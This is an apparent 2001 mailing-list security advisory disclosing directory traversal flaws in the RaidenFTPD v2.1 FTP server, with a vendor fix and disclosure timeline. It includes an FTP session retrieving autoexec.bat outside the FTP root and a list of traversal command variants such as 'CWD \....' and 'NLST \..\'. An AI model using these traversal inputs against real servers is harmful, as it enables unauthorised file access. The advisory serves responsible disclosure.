Date: Wed, 25 Apr 2001 17:13:06 -0800
From: [email protected]
To: [email protected]Subject: Vulnerabilities in RaidenFTPD Server
--Hushpart_boundary_KLDGEnoUQaVCFwrpbAzWHTqNdnmwyiRz
Content-type: text/plain
----- Begin Hush Signed Message from [email protected] -----
Vulnerabilities in RaidenFTPD Server
Overview
RaidenFTPD v2.1 is an ftp server available from
http://playstation2.idv.tw/raidenftpd. Vulnerabilities exist which allow
users to break out of the ftp root.
Details
The following is an illustration of the problem:
> ftp localhost
220-This FTP site is running free version of RaidenFTPD
220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd-
site/
220-Download english version from http://playstation2.idv.tw/raidenftpd/
220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00)
220-This server is for private use only
220-If you do not have access to this server
220-Please disconnect now
220 Please enter your login name now.
User (xxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog .
Password:
[really long login banner edited out]
230 User jdog logged in , proceed.
ftp> get ....\....\autoexec.bat
200 Port command ok.
150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII
226-Ñ+ª+¦s+uññ_zª@ ñU¦¦ : 419 ª_ñ+_+ ñW¦¦ : 0 ª_ñ+_+
226-¦¦½ßñ@ª+ñU¦¦¬¦¦t½+¼O : 419 kb/sec _zª¦ Unlimited kb ¬¦ñU¦¦+B½+
226-Ñ+½e¬¦Ñ++²¼O /
226 Transfer finished successfully. Data connection closed.
ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec.
ftp> cd ....
250-ª¦Ñ++²¦-ñU¬+¦í 1323 mb
250 "/.." is current directory.
This excerpt was taken from a session involving build #947. The vendor
released
four builds since I initially contacted them to address additional
variations. The following is a list of vulnerabilities which affected
these intermediate versions:
CWD \....
CWD *\.....
CWD /..../
NLST ..
NLST ...
NLST \..\
NLST \...\
Solution
Upgrade to build #952 at:
http://playstation2.idv.tw/raidenftpd/download.html
Vendor Status
Team JohnLong was contacted via <[email protected]> on
Friday, April 20, 2001. They quickly responded and worked diligently
on the problems until all issues were fixed.
- Joe Testa
e-mail: [email protected]
web page: http://hogs.rit.edu/~joet
AIM: LordSpankatron
----- Begin Hush Signature v1.3 -----
DETiFUfoDmGE9uJrpJQgFYn0g6gsy4jHJP1HF9UYGCGXml8h83eoWF/cf5RQyGkHmr0R
ugydtjBf8iVLc0IMCfWMvOjYr0nlTaD61+gMW3L+2f2e1B2Q4S4h2Stlr2KYtGgCWy1S
6mTEVkFx7gYyQkA/U3cTf6anmWXsdqQRpldlQQCr8J4HfW4chdqUNg9mSyffhX8Lin6S
bx5br4lSTfcnxcJLZjtfNK/r1H2/dPv/3JGf1YbIBK/2SusAvyhaNibLfE9rIBfSB+Tn
L169d/o0fSk9zJMceIzXPqv12AgXyeqPSlOdc647BsSSCH1GyyojWy+4YHnAeCfzenps
OjB7vBfW3OoRgNsLqVk1kd10vtOGjZmz+axV+LaVbatnG6qeo2ymkYX7sJRnf5LI+8CR
/O7vxrzfNxjqHsc0FIHLa6/FFZDG570D3SZYdsX3rPXCBzUV11xp4SJ0KsZsGIy33OnD
9H9lWZeoDNOnJE4/2WKw+y8KE5Io/BDeXrmW63LeHeSS
----- End Hush Signature v1.3 -----
This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools
Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_KLDGEnoUQaVCFwrpbAzWHTqNdnmwyiRz--
